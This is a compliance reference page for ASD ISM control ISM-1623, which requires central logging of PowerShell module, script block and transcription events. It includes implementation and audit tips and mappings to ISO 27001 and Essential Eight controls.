Centralised Logging of PowerShell Activities
Ensure PowerShell actions and logs are collected in a central place for monitoring.
Plain language
This control is about making sure all the actions and logs from PowerShell, a tool commonly used in Windows computers, are collected in a central spot. This matters because if you don't keep track of what's happening with PowerShell, you might miss signs that someone is trying to break into your computers or steal important data.
Framework
ASD Information Security Manual (ISM)
Control effect
Detective
Classifications
NC, OS, P, S, TS
ISM last updated
Nov 2023
Control Stack last updated
19 Mar 2026
E8 maturity levels
ML2, ML3
Official control statement
PowerShell module logging, script block logging and transcription events are centrally logged.
Why it matters
Without centralised logging of PowerShell module, script block and transcription events, malicious PowerShell use may go unnoticed, leading to compromise or data breach.
Operational notes
Enable module logging, script block logging and transcription, forward events to a central SIEM, and routinely hunt for suspicious cmdlets, encoded commands and unusual scripts.
Implementation tips
- The IT team should set up a central logging service that collects logs from all computers in the organisation. This can be done by configuring each computer to send their logs to a central server where they can be stored for review.
- System administrators should enable PowerShell module logging on all computers. This involves changing the settings in PowerShell to record which modules are being used and sending those logs to the central server.
- IT personnel need to activate script block logging to capture detailed information about the PowerShell scripts being run. They can do this by adjusting group policy settings or setting it directly on each computer to ensure scripts are logged properly.
- The IT security team should implement transcription logging, which records the input and output of PowerShell sessions. They can set this up in PowerShell by enabling transcription settings that will then send the logs to a central location.
- The IT manager should regularly review the collected PowerShell logs to check for unusual activity. This involves examining the logs for any signs of unauthorised access or unexpected changes and ensuring they are stored for an appropriate time period as required by company policy or regulations.
Audit / evidence tips
-
Askthe central logging server configuration details: Request documents or screenshots showing how computers are set up to send logs to the server
Goodresult will show an active system where logs are received and stored correctly
-
Goodwill show the settings are enabled and functional across all computers
-
Askdocumentation or screenshots showing script block logging is turned on in PowerShell. Ensure this setting is enabled and logs are going to the central collection
Goodresult will confirm this feature is active and reporting correctly
-
Askevidence of transcription logging settings: Request details or screenshots proving transcription logging is configured for PowerShell sessions. Check that these settings send the logs centrally and are not disabled
Goodwill show these logs are being recorded and sent properly
-
Goodresult will indicate logs are reviewed regularly and any issues are followed up
Cross-framework mappings
How ISM-1623 relates to controls across ISO/IEC 27001, Essential Eight, and ASD ISM.
ISO 27001
| Control | Notes | Details |
|---|---|---|
| layers Partially meets (1) expand_less | ||
| Annex A 8.15 | ISM-1623 requires centralised logging specifically for PowerShell module, script block and transcription events | |
| handshake Supports (1) expand_less | ||
| Annex A 5.28 | ISM-1623 requires centralised collection of detailed PowerShell activity logs (module, script block and transcription) | |
E8
| Control | Notes | Details |
|---|---|---|
| sync_alt Partially overlaps (2) expand_less | ||
| E8-RA-ML2.7 | E8-RA-ML2.7 requires privileged account and group management events to be centrally logged for visibility of administrative changes | |
| E8-AH-ML2.12 | E8-AH-ML2.12 requires that command line process creation events are centrally logged | |
| link Related (1) expand_less | ||
| E8-AH-ML2.11 | ISM-1623 requires that PowerShell module logging, script block logging and transcription events are centrally logged for monitoring | |
These mappings show relationships between controls across frameworks. They do not imply full equivalence or certification.